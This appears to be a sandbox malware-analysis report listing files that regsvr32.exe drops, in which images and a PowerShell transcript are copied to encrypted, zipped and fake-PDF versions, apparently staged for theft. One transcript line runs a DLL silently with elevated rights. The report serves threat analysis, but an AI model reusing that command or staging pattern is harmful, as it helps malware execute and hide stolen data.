              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt
              Process:C:\Windows\System32\regsvr32.exe
              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
              Category:dropped
              Size (bytes):1090
              Entropy (8bit):5.147237381250279
              Encrypted:false
              SSDEEP:24:BxSAjTp3RCvi3OQx2DOXisXA3bEMWz0jeuKK6X4CIym1ZJXLVA3bEunxSAZQ:BZlRCvqOQoOCbWzCKYB1ZgbBZZQ
              MD5:0B7BBD141D7FB4542A1374C43369F80C
              SHA1:02C808E1E32696033002289F2AAA5D849C940437
              SHA-256:17FA171B58D2ABBB8C979F79E87D6D28AA938E7030D047DC2C6273F9A44874EC
              SHA-512:70A1EC6A5C0C2F84F3DAD0E2A179D84047AE1504F0F787BCB7B6FC7A97EE5598CF9F460C4326BA5536F7F636A094AC04A73E60C8B79FCDAC465159FF3B4E1245
              Malicious:false
              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210825105914..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..Process ID: 2324..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210825105914..**********************..PS>start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..**********************..Command start time: 20210825110212..**********************..PS>$global:?..True..*******************
              C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt.enc
              Process:C:\Windows\System32\regsvr32.exe
              File Type:data
              Category:dropped
              Size (bytes):858
              Entropy (8bit):7.765355003533637
              Encrypted:false
              SSDEEP:12:bksmeVUxInvvFZWenB0EwJ6y/Hx7XRfWTQpVIROgEavqZdhGwR8DBOuwxgvAyn:bPmeuxcZpnwJl/xooKROgEavqEwRcMjy
              MD5:73F5709B2C848164692E604719D266D2
              SHA1:29029F55D29392FA3EE7FD1BFC3AC1D402FA393C
              SHA-256:8202F0E42125869988A141AC8A3FF9E7F4F5E6B9D7BCA6CE5037D0CDA80FE2BA
              SHA-512:48AF81813D3CE8354A1F442A10B6719BD1A39EC59D677CF0E82F451D6E7970ADF463AF048B007820142D6691EC23581B81D3C992D6B4456ECD592836D11EF059
              Malicious:false
              Preview: .....CY;....{5...LpY..M...z........Y...!.........,:a.B..sS...B...GL....<.....|..P.d.s....m.?!..G..q..wg.%;..X.GS..T..c.P.0/N.....><x...oE-.........,~~9A....v......[.a.....W].J....oo.V+..(..<..z....Weg.M...c.k`.{...^,....R..n..>GG`.B...-qv...l.....:.I'F....L.2.D.p...35.l2......x...{4S....Y.v!u...j....`..._.<..U5..s.>.W..3.W...1..Yg..6.7....X...Uj......X~+3T.w.....D_w.E...1.a.....=D.t.Q|...c......Yq.%c.t....,.c.K...U.a..c...R6.R..&6... ..\..N........5e.../.............3.>...R.......q}.xD...F.0.GE....Dm1.."&8,..[..\...&3......+.)..)....VKK.....V......sC........d..-.#.{.0h.]uZ.oWE..u...s..Rd^....p.Q,..V..g.a..W~.7/So..E...&.f...m......u...5.......P4"X.lb.=........e...eB....T....!..q...w..k........i.+ ..qoQ...tl....R...Y.o!.H.e.d!..m9\.'.O.Fk.n:4...c_=.rs...&Jv~..:.E.P.....%UV..p.....3K.8]>..Lv..w..Y..
              C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:PDF document, version 1.7
              Category:dropped
              Size (bytes):899
              Entropy (8bit):7.784352727522272
              Encrypted:false
              SSDEEP:24:Ydw5hCa4jD0kydwk+TlqrAvAYPvRdfCxD:Y3lD7yNqvbP5di
              MD5:DBDCA9F737B41F6075AA4A2839DCD797
              SHA1:37DE936A10C3B777AB2F2A6547BAF48F5395A5F6
              SHA-256:5637D2B7EB7DDB25A7F2A852DF12C910C643392466A58D7A7AB0B32F9ECE43DE
              SHA-512:E4210A516099A6C333B3BC0FF67562FEA455D5130265401E8DACE87E740C3BAE150AA8B742C066B86C50CB31E797BB848B18CB47A2DABC9C27C8DC6DBCA59FDB
              Malicious:false
              Preview: %PDF-1.7..4 0 obj....C..t.q.N.2s.4;...t32Yu2.].O..6...-].MZ.......E^..c......;-t..fUX......gg.Cj.Y.N...d.....$....P..Vbg..$..dK....<...%L..f.|...G."..@8......[...{..*.C:4...Y...BS'.....z.2.j..8F..=#....m..v....9...B.,.._/.(.]..N./......x5.w.P.:8<S.o/,H ..F.&.....3..a....J.........:3r.g...yF%5.>/.'.9...2l..exR'.. g;....4......X..(..wH{..x......G...>UGE&..:.t.m\.hu..l.d..m...aQz.WR.)~e.fmc..3H.....4.....u..r@...0P.t..Np.0X1.Qz.....k......$]..:.N:..Ygnu...].>.BX#.........#...a..T.........[x.......=.u..1O.V.`..$......D.5..........5m...Q2..$_.ir(K..h....6g........d8_.5A9D.....qe.....D....\.m.I.$\....8.#..;...g.....j....p.!."86........r...D;gT4T..o.BW.(}..Y.[..Y.....{y....#.w......s....6&...C..+.......,...?....C.....'..p..l[.?.%..,...l_I,.F..;.....e..........m.S%>.......".. ...s.).U^BEp.y_..!.F.(.1amk:3.....3....*....P.ds(..>..n.
              C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt.zip
              Process:C:\Windows\System32\regsvr32.exe
              File Type:Zip archive data, at least v2.0 to extract
              Category:dropped
              Size (bytes):838
              Entropy (8bit):7.2244931203068745
              Encrypted:false
              SSDEEP:12:5jISrht21PKrK6h7QsTaawQllNi9z0RwMQn0X5LSrht2Oi5KvSrht41iaUl:9A1PKrzh7Q2av0lU9My64q
              MD5:197BBB2CE7DF0000C5D6046E85CCD0D1
              SHA1:46BE4C765343BA8EDE7DE5BA7B77FC040D270D3F
              SHA-256:04D734A5402CC31BA05F8CE8261547A8984EFE9EF8AA435B70301043D5953461
              SHA-512:65B60824D607E5A76CB0EB9CC41336020EA9E35FB9F4EDBA420FDBB9FE0B620C8476A13EA9368969EDF988C3D64FC1F800655BF71EF02616DDE8F100657FD949
              Malicious:false
              Preview: PK........lW.S........B...A...4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txtUT...z.&a{.&a{.&a.S..0..[.;.......O.9..?.K.K.....&........j...x.....Jp ....x..f&.>.......:......-..YM.)5o-2.j.A._..(.!....dFb.>..%..r..w.......b.XM%..N^....c.J....r%.u....-o.t..i<EO7.....~..!.....$.......Xt...}...^........&.V%3.iV.{..=4....&........i.iUk.,..E.j..f.*.y..B5...s..J.34.gz.t'.. ;V.\..E..Y..t.znI@...4.....%3wV...n...`.{&E$..Q.M.M.M2..2.;..S._z.....s)..Gd..!...F.....;.Z..5.rY;iV.J..0..0.._...,.x.......o,..0..-........I.qN...'.P{*.7..t..c..... X9..G.;PK........lW.S..7@....B...A...4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txtUT...z.&a{.&a{.&aPK..........lW.S..7@....B...A......... .......4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txtUT...z.&aPK..........x...H.....
              C:\ProgramData\temp\5004.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\509C.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\596F.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\5E8.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\6407.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\7F3.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\83C3.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\85DD.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):64408
              Entropy (8bit):7.587474687549308
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
              MD5:6A95989BDB33E31A1CBA8258F4199040
              SHA1:3E81CCB803AA348212AEA8C9E31831DE991F972B
              SHA-256:BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
              SHA-512:D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\8848.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
              Category:dropped
              Size (bytes):66090
              Entropy (8bit):7.595969014391596
              Encrypted:false
              SSDEEP:768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+576eod+V1dMZFAeW:r47QDkBV0xiRB28EY3QZH4SbPb0T
              MD5:FE8F032583FCC1FB9B11E68C28E5CB7E
              SHA1:B2A9B1735C0767169F661FD53296D46B5A42D8F4
              SHA-256:45A703E8983E5E03B0C4288615F6198E1C23C7F5B808A4EAC4CB33F7AE711BF8
              SHA-512:751298D796393371343E3131CFF2055B362DC260DF20E2370D9986A48C423D63E8A6D0363EC7A5E487FB9C4715C9C75365485EABA1F5B7C7BAB13197E947B6D9
              Malicious:false
              Preview: ......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.
              C:\ProgramData\temp\8848.tmp.enc
              Process:C:\Windows\System32\regsvr32.exe
              File Type:data
              Category:dropped
              Size (bytes):46819
              Entropy (8bit):7.99605837396729
              Encrypted:true
              SSDEEP:768:e/w8JHLzlGNR8ApdNgRF7ZUiCmFoYh7c+0vPJZ4H3J4lkY7qBuDA9aueNc7jrY3:eo8RYJNgRoiCmFDhQhPJZ4H3ul7qq4sL
              MD5:720F610B44BB012C8748EF2A37E55952
              SHA1:8F73CB5314383A4ADAD188D32FB0ED6F8CE251C7
              SHA-256:FAF13F0595A73865E319C7FB0F1BF0FDF038783BF04407A93A89C0E429651C1B
              SHA-512:A76002BCC643793F41207E93F30F07C81BAD9A4C824E605B94F1344588C312C766729C7469BD0D74E47BD679F2F3C418370CE95B48B98DCCCF5D0BDC45C0EFCF
              Malicious:false
              Preview: _........Td......(..+D.dk..d`^P.:{K%Uw.9.............2..g....H..=._h._.....@..y.X.-5$e..V+Z1w....~hu."..,..`... %...*.}.$.8.|.....t.f.kmT.RMN..Fr._..>P<C..tPH..r.K@.x..a...s...*..N........Mx]..q.d.=..Z...B..K.[....W..>\8.]....Z.g..2l.*o!.....H..8o.~.'../....d....5...G.......r._V$+.....\.UM)Ik.f.C.N./Q..X......!....5&.0..>...}.!...Q\.../.*.c.....0.F....i!...l..V........D.t....Z..P_...a..!.......EB.O......a|b..j.+H.....X..b^.UR......3.:V.>9'..3.wX,G.sIbL.3.(..&.Y....\.r.......M.t..B.....`...D....=6..^SU.<>.P..,89......j....j...y.#.x.~... $....6.E.J.w.!..m..^;..S..}.....z.9.E...j..T....xT&.Z.N.@(^c..c...O....`+......p.Ns.@.D..v!..>..*....{..1..A..w.Q...g1w.w..../.*.X.(k..:...{.A.....,D:.. .,E3.#i....R.#'.2..Hn?.`......g.'+N!..!.j.k.-.....^&.!.QkT..O%\..4Wa.PC......1.].S)@.......n~.^...-.l.....z...L....H...)..t..l@QD....d..^....S.b.4.0..._.L.0...R00..D|u...CP.=.'.-X...q....oN.,.`.(m..g6....0..7LC$...f:..@]%.w..Hd.TO.T$$..@%X.....k.*..;..7./..7W.
              C:\ProgramData\temp\8848.tmp.tmp
              Process:C:\Windows\System32\regsvr32.exe
              File Type:PDF document, version 1.7
              Category:dropped
              Size (bytes):46860
              Entropy (8bit):7.995465174888598
              Encrypted:true
              SSDEEP:768:lohAa/dXJS+Keiq/5bP3AAdIqq5/3pZaY/2fdw1Bm+rVpuXbQ3:loGa7oel/5sv5Fg0BmOVK8
              MD5:2A81E20407E3D6853201B6DE8FBA93A2
              SHA1:5882D65CFDCDFA1B536C473D62D4E8293880ED39
              SHA-256:C5F7D69B29ECFBC6E043F2EE45C58612AD1B11F9069D8A934EC4E0F07C242CBC
              SHA-512:DF70E288768C93CFFF95152C4487657CDDB02810604AD7E9A50D69BE2467F375468D84A4D8CF152C096D7F0CD79F876BBEBE47C7F2C84AF54BF545C2645D7571
              Malicious:false
              Preview: %PDF-1.7..4 0 obj....)..Nj..:?Q.'...v..N.K./.k5T3.gg..A.i.Q..G.....Mk?......J.[V&.......O..Cc@.......Wx..`. 2...7..2r...Z.sq...^y...!..O s3....IP..J.....{?Z[.|..z..grN.......K..v.............`....9MQ.gP....$....{...&/...P....g.W..a...\1.7...t...../...OT..[.b....#Nf.|.i...@ON.X...i....+.....=.t!z.{.~..9..9.#.PjAv.d(...r..BA`V)..^........'...K.Z....F........Q..1..{....p.d..\6......{..U...k.)S....U0.A...V|..K.D.L..3UV..G..;4pj..\O.KC.t.dH...S....<.l.A..K."..5{...T....r..b9..t.....YD...x..n..=.?.C.N....{V.u...z7..K.re)%U Mf.f....'N.....z.rTl.(.}...2N._.$r.4P.U.W......0w...._..V...LQ.*...R..y.II...M.9.M;.+0...;...$.E... .._.Ts.HJ*...+'26.`<.......j.......Z.F..........W..,..5..E...Z..N...)[._./.Oq.'.H...f.s&8./.g\a.Q2..F..6....b...@1....m...c..........sj1.X........$a....^......W%>.6..c.....}..EH.-..........Y..+ .D2.i.fC.....r)\.@<.Y..F..ENN.W.7.K.EK....W.I.B....t-.-..6Ln..Av.a..J..L....~(.|...y..........#..$H.G....f..W..2..."..Ejzu.....g.H^$.
              C:\ProgramData\temp\8848.tmp.zip
              Process:C:\Windows\System32\regsvr32.exe
              File Type:Zip archive data, at least v2.0 to extract
              Category:dropped
              Size (bytes):46742
              Entropy (8bit):7.994725833905889
              Encrypted:true
